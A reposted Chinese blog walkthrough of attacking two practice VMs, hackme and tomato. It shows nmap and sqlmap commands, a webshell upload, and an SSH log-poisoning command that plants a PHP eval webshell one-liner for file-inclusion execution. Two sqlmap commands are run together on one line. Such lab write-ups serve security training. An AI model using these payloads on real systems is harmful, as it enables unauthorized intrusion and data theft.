欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 养生 > 文件包含漏洞(hackme和tomato靶机实战)

文件包含漏洞(hackme和tomato靶机实战)

2025/2/25 20:21:20 来源:https://blog.csdn.net/2301_79848048/article/details/144618750  浏览:    关键词:文件包含漏洞(hackme和tomato靶机实战)

hackme靶机

1.扫描靶机IP

靶机搭好后

扫描我们靶机的IP

nmap -O 192.168.187.128/24

扫描到靶机的IP后去访问他

2.信息收集

挨个访问后有文件上传的路径;uploads

网站登录界面;login.php

3.寻找薄弱点

网页首页是个登录界面,注册个账号登录看看

登录后的界面

判断是否存在SQL注入

发现是字符型注入

4.漏洞利用

sqlmap一跑就出来了

#手工sqlmap
python sqlmap.py -r 1.txt --dbs --tables --columns --batchpython sqlmap.py -r 1.txt -D webapphacking -T users --dump --batch

发现了superadmin去md5解密获取密码

Uncrackable

5.获取shell

登陆后来到了文件上传

上传我们的木马文件

蚁剑连接

\

连接成功

tomato靶机

1.扫描靶机IP

靶机搭好后

扫描我们靶机的IP

扫描到靶机的IP后去访问他

2.信息收集

有一个目录网站

3.寻找薄弱点

在phpinfo中可以看到网站的绝对路径和当前用户

phpinfo源代码有给include的函数

4.漏洞利用

利用一下include函数去尝试读取其他文件

读取到了就来看一下日志文件

我们可以利用报错连接来运行我们的一句话

利用MobaXterm来连接SSH

这就可以了

或者用kali输入命令

ssh '<?php @eval($_POST[cmd]);?>'@192.168.187.131 -p 2211

连接成功

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词